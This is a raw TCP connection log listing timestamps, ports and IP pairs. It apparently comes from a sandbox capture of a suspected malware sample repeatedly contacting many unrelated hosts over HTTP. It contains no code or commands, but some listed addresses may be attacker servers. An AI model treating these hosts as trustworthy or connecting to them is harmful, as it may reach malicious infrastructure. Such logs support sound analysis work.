Dec 1, 2021 16:23:14.783546925 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.798012972 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.798101902 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.798170090 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.798191071 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.798208952 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.798244953 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.798373938 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.798399925 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.798461914 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.798475027 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.798501015 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.798523903 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.798541069 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.798568964 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.798609018 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.798613071 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.798621893 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.798664093 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.798700094 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.798702002 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.798747063 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.913575888 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.913621902 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:21.676069021 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:21.676120996 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.676214933 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:21.716367960 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:21.716406107 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.756385088 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.756571054 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:21.771951914 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:21.771981955 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.772363901 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.772449970 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:21.787898064 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:21.828882933 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.840156078 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.840262890 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:21.840282917 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.840333939 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.840373039 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:21.840374947 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.840389013 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:21.840389013 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.840439081 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:21.840445995 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.840497017 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:21.840497017 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.840507984 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.840558052 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:21.840564013 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.840616941 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:21.840617895 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.840629101 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.840679884 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:21.840686083 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.840698004 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.840742111 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:21.840748072 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.840780020 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.840802908 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:21.840810061 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.840843916 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:21.840867043 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.840883017 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:21.840888977 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.840934038 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:21.840938091 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.840970039 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:21.840972900 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.840982914 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.841006994 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:21.841036081 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.841061115 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:21.841067076 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.841092110 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:21.841099977 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.841120005 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:21.841125965 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.841162920 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.841171026 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:21.841197014 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.841203928 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:21.841208935 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.841248035 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:21.841253042 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.841283083 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:21.841288090 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.841321945 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:21.841322899 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.841360092 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.841361046 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:21.841370106 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.841403961 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:21.841428041 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.841444016 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:21.841449022 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.841485977 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:21.841485977 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.841522932 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.841526031 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:21.841533899 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.841566086 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:21.841592073 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.841609001 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:21.841614962 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.841656923 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.841667891 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:21.841671944 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.841712952 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:21.841742992 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:21.858000040 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.858086109 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:21.858129025 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.858194113 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.858241081 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.858387947 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:21.858393908 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:21.858407021 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.858428001 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.858484983 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:21.858491898 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.858505964 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.858545065 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:21.858546972 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.858592033 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:21.858592987 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.858607054 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.858643055 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:21.858681917 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:21.858685970 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.858697891 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.858736038 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.858747959 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:21.858757973 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.858779907 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.858793974 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:21.858823061 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.858850956 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:21.858855963 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.858863115 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:21.858870029 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.858892918 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:21.858900070 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.858938932 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.858966112 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:21.858973026 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.858979940 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:21.859000921 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:21.859090090 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:21.876399994 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.876518011 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.876524925 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:21.876543999 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.876564026 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.876595020 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:21.876601934 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.876643896 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.876646042 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:21.876657009 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.876698017 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:21.876746893 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.876801968 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:21.876816988 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.876873970 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:21.876935005 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.876982927 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.877019882 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.877063036 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:21.877067089 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.877079010 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.877121925 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.877170086 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.877187967 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:21.877197981 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.877229929 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.877252102 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.877259016 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:21.877264977 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:21.877270937 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.877310991 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.877325058 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:21.877345085 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.877357960 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.877401114 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:21.877408028 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.877419949 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.877441883 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:21.877463102 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.877505064 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:21.877511978 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.877525091 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.877546072 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:21.877568007 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.877609968 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.877610922 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:21.877620935 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.877667904 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:21.877669096 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.877680063 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.877712965 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.877722979 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:21.877731085 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.877788067 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:21.877796888 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.877809048 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.877850056 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:21.877960920 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.878036976 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:21.878154039 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.878182888 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.878230095 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:21.878238916 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.878257036 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.878297091 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:21.878312111 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.878350973 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.878372908 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:21.878381968 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.878475904 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:21.878773928 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.878832102 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:21.878845930 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.878865957 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:23:21.878921986 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:22.086766005 CET	49757	443	192.168.2.3	162.159.130.233
Dec 1, 2021 16:23:22.086796999 CET	443	49757	162.159.130.233	192.168.2.3
Dec 1, 2021 16:24:49.385133028 CET	49807	80	192.168.2.3	23.224.31.114
Dec 1, 2021 16:24:49.546839952 CET	80	49807	23.224.31.114	192.168.2.3
Dec 1, 2021 16:24:49.546956062 CET	49807	80	192.168.2.3	23.224.31.114
Dec 1, 2021 16:24:49.547094107 CET	49807	80	192.168.2.3	23.224.31.114
Dec 1, 2021 16:24:49.708868027 CET	80	49807	23.224.31.114	192.168.2.3
Dec 1, 2021 16:24:49.708903074 CET	80	49807	23.224.31.114	192.168.2.3
Dec 1, 2021 16:24:49.708920956 CET	80	49807	23.224.31.114	192.168.2.3
Dec 1, 2021 16:24:49.709151983 CET	49807	80	192.168.2.3	23.224.31.114
Dec 1, 2021 16:24:49.709207058 CET	49807	80	192.168.2.3	23.224.31.114
Dec 1, 2021 16:24:49.873502970 CET	80	49807	23.224.31.114	192.168.2.3
Dec 1, 2021 16:24:54.765203953 CET	49808	80	192.168.2.3	2.57.90.16
Dec 1, 2021 16:24:54.801892996 CET	80	49808	2.57.90.16	192.168.2.3
Dec 1, 2021 16:24:54.802097082 CET	49808	80	192.168.2.3	2.57.90.16
Dec 1, 2021 16:24:54.802287102 CET	49808	80	192.168.2.3	2.57.90.16
Dec 1, 2021 16:24:54.838797092 CET	80	49808	2.57.90.16	192.168.2.3
Dec 1, 2021 16:24:54.839745045 CET	80	49808	2.57.90.16	192.168.2.3
Dec 1, 2021 16:24:54.839764118 CET	80	49808	2.57.90.16	192.168.2.3
Dec 1, 2021 16:24:54.839910030 CET	49808	80	192.168.2.3	2.57.90.16
Dec 1, 2021 16:24:54.839968920 CET	49808	80	192.168.2.3	2.57.90.16
Dec 1, 2021 16:24:54.876522064 CET	80	49808	2.57.90.16	192.168.2.3
Dec 1, 2021 16:25:00.037035942 CET	49809	80	192.168.2.3	154.81.158.75
Dec 1, 2021 16:25:00.226552963 CET	80	49809	154.81.158.75	192.168.2.3
Dec 1, 2021 16:25:00.226777077 CET	49809	80	192.168.2.3	154.81.158.75
Dec 1, 2021 16:25:00.226923943 CET	49809	80	192.168.2.3	154.81.158.75
Dec 1, 2021 16:25:00.421998024 CET	80	49809	154.81.158.75	192.168.2.3
Dec 1, 2021 16:25:00.422022104 CET	80	49809	154.81.158.75	192.168.2.3
Dec 1, 2021 16:25:00.422030926 CET	80	49809	154.81.158.75	192.168.2.3
Dec 1, 2021 16:25:00.422194004 CET	49809	80	192.168.2.3	154.81.158.75
Dec 1, 2021 16:25:00.422276020 CET	49809	80	192.168.2.3	154.81.158.75
Dec 1, 2021 16:25:00.612165928 CET	80	49809	154.81.158.75	192.168.2.3
Dec 1, 2021 16:25:05.830269098 CET	49810	80	192.168.2.3	163.44.239.73
Dec 1, 2021 16:25:06.123773098 CET	80	49810	163.44.239.73	192.168.2.3
Dec 1, 2021 16:25:06.132922888 CET	49810	80	192.168.2.3	163.44.239.73
Dec 1, 2021 16:25:06.424876928 CET	49810	80	192.168.2.3	163.44.239.73
Dec 1, 2021 16:25:06.718482971 CET	80	49810	163.44.239.73	192.168.2.3
Dec 1, 2021 16:25:06.902086020 CET	80	49810	163.44.239.73	192.168.2.3
Dec 1, 2021 16:25:06.902127981 CET	80	49810	163.44.239.73	192.168.2.3
Dec 1, 2021 16:25:06.902143955 CET	80	49810	163.44.239.73	192.168.2.3
Dec 1, 2021 16:25:06.902160883 CET	80	49810	163.44.239.73	192.168.2.3
Dec 1, 2021 16:25:06.902179956 CET	80	49810	163.44.239.73	192.168.2.3
Dec 1, 2021 16:25:06.902194977 CET	80	49810	163.44.239.73	192.168.2.3
Dec 1, 2021 16:25:06.902369022 CET	49810	80	192.168.2.3	163.44.239.73
Dec 1, 2021 16:25:06.902426958 CET	49810	80	192.168.2.3	163.44.239.73
Dec 1, 2021 16:25:06.948237896 CET	49810	80	192.168.2.3	163.44.239.73
Dec 1, 2021 16:25:07.241766930 CET	80	49810	163.44.239.73	192.168.2.3
Dec 1, 2021 16:25:11.996210098 CET	49820	80	192.168.2.3	156.67.222.132
Dec 1, 2021 16:25:12.185084105 CET	80	49820	156.67.222.132	192.168.2.3
Dec 1, 2021 16:25:12.185373068 CET	49820	80	192.168.2.3	156.67.222.132
Dec 1, 2021 16:25:12.185509920 CET	49820	80	192.168.2.3	156.67.222.132
Dec 1, 2021 16:25:12.374352932 CET	80	49820	156.67.222.132	192.168.2.3
Dec 1, 2021 16:25:12.374897957 CET	80	49820	156.67.222.132	192.168.2.3
Dec 1, 2021 16:25:12.374916077 CET	80	49820	156.67.222.132	192.168.2.3
Dec 1, 2021 16:25:12.374927044 CET	80	49820	156.67.222.132	192.168.2.3
Dec 1, 2021 16:25:12.375066996 CET	49820	80	192.168.2.3	156.67.222.132
Dec 1, 2021 16:25:12.375272989 CET	49820	80	192.168.2.3	156.67.222.132
Dec 1, 2021 16:25:12.375346899 CET	80	49820	156.67.222.132	192.168.2.3
Dec 1, 2021 16:25:12.375416994 CET	49820	80	192.168.2.3	156.67.222.132
Dec 1, 2021 16:25:12.564116001 CET	80	49820	156.67.222.132	192.168.2.3
Dec 1, 2021 16:25:22.568660975 CET	49835	80	192.168.2.3	68.70.164.19
Dec 1, 2021 16:25:22.679769993 CET	80	49835	68.70.164.19	192.168.2.3
Dec 1, 2021 16:25:22.679917097 CET	49835	80	192.168.2.3	68.70.164.19
Dec 1, 2021 16:25:22.680155993 CET	49835	80	192.168.2.3	68.70.164.19
Dec 1, 2021 16:25:22.792130947 CET	80	49835	68.70.164.19	192.168.2.3
Dec 1, 2021 16:25:22.792427063 CET	80	49835	68.70.164.19	192.168.2.3
Dec 1, 2021 16:25:22.792458057 CET	80	49835	68.70.164.19	192.168.2.3
Dec 1, 2021 16:25:22.792665958 CET	49835	80	192.168.2.3	68.70.164.19
Dec 1, 2021 16:25:22.792790890 CET	49835	80	192.168.2.3	68.70.164.19
Dec 1, 2021 16:25:22.905150890 CET	80	49835	68.70.164.19	192.168.2.3
Dec 1, 2021 16:25:27.922558069 CET	49836	80	192.168.2.3	165.32.109.217
Dec 1, 2021 16:25:30.937884092 CET	49836	80	192.168.2.3	165.32.109.217
Dec 1, 2021 16:25:36.953943014 CET	49836	80	192.168.2.3	165.32.109.217
Dec 1, 2021 16:25:52.459028959 CET	49837	80	192.168.2.3	165.32.109.217
Dec 1, 2021 16:25:54.048943043 CET	49838	80	192.168.2.3	198.54.117.211
Dec 1, 2021 16:25:54.218070984 CET	80	49838	198.54.117.211	192.168.2.3
Dec 1, 2021 16:25:54.218308926 CET	49838	80	192.168.2.3	198.54.117.211
Dec 1, 2021 16:25:54.218569040 CET	49838	80	192.168.2.3	198.54.117.211
Dec 1, 2021 16:25:54.390382051 CET	80	49838	198.54.117.211	192.168.2.3
Dec 1, 2021 16:25:54.390403986 CET	80	49838	198.54.117.211	192.168.2.3
Dec 1, 2021 16:25:55.471127033 CET	49837	80	192.168.2.3	165.32.109.217
Dec 1, 2021 16:25:59.731318951 CET	49839	80	192.168.2.3	64.69.40.19
Dec 1, 2021 16:26:00.028845072 CET	80	49839	64.69.40.19	192.168.2.3
Dec 1, 2021 16:26:00.029201031 CET	49839	80	192.168.2.3	64.69.40.19
Dec 1, 2021 16:26:00.029511929 CET	49839	80	192.168.2.3	64.69.40.19
Dec 1, 2021 16:26:00.323343039 CET	80	49839	64.69.40.19	192.168.2.3
Dec 1, 2021 16:26:00.505376101 CET	80	49839	64.69.40.19	192.168.2.3
Dec 1, 2021 16:26:00.505429029 CET	80	49839	64.69.40.19	192.168.2.3
Dec 1, 2021 16:26:00.505580902 CET	49839	80	192.168.2.3	64.69.40.19
Dec 1, 2021 16:26:00.518768072 CET	49839	80	192.168.2.3	64.69.40.19
Dec 1, 2021 16:26:00.799170971 CET	80	49839	64.69.40.19	192.168.2.3
Dec 1, 2021 16:26:00.799202919 CET	80	49839	64.69.40.19	192.168.2.3
Dec 1, 2021 16:26:00.799331903 CET	49839	80	192.168.2.3	64.69.40.19
Dec 1, 2021 16:26:00.922574997 CET	80	49839	64.69.40.19	192.168.2.3
Dec 1, 2021 16:26:00.922708988 CET	49839	80	192.168.2.3	64.69.40.19
Dec 1, 2021 16:26:01.487277031 CET	49837	80	192.168.2.3	165.32.109.217
Dec 1, 2021 16:26:05.564824104 CET	49840	80	192.168.2.3	198.54.117.217
Dec 1, 2021 16:26:05.733778000 CET	80	49840	198.54.117.217	192.168.2.3
Dec 1, 2021 16:26:05.733947039 CET	49840	80	192.168.2.3	198.54.117.217
Dec 1, 2021 16:26:05.747251034 CET	49840	80	192.168.2.3	198.54.117.217
Dec 1, 2021 16:26:05.916287899 CET	80	49840	198.54.117.217	192.168.2.3
Dec 1, 2021 16:26:05.916342020 CET	80	49840	198.54.117.217	192.168.2.3
Dec 1, 2021 16:26:16.018532991 CET	49841	80	192.168.2.3	86.105.245.69
Dec 1, 2021 16:26:16.046459913 CET	80	49841	86.105.245.69	192.168.2.3
Dec 1, 2021 16:26:16.046551943 CET	49841	80	192.168.2.3	86.105.245.69
Dec 1, 2021 16:26:16.046744108 CET	49841	80	192.168.2.3	86.105.245.69
Dec 1, 2021 16:26:16.074521065 CET	80	49841	86.105.245.69	192.168.2.3
Dec 1, 2021 16:26:16.108149052 CET	80	49841	86.105.245.69	192.168.2.3
Dec 1, 2021 16:26:16.108391047 CET	49841	80	192.168.2.3	86.105.245.69
Dec 1, 2021 16:26:16.108463049 CET	49841	80	192.168.2.3	86.105.245.69
Dec 1, 2021 16:26:16.135833025 CET	80	49841	86.105.245.69	192.168.2.3
Dec 1, 2021 16:26:21.419675112 CET	49842	80	192.168.2.3	66.235.200.145
Dec 1, 2021 16:26:21.436815977 CET	80	49842	66.235.200.145	192.168.2.3
Dec 1, 2021 16:26:21.439889908 CET	49842	80	192.168.2.3	66.235.200.145
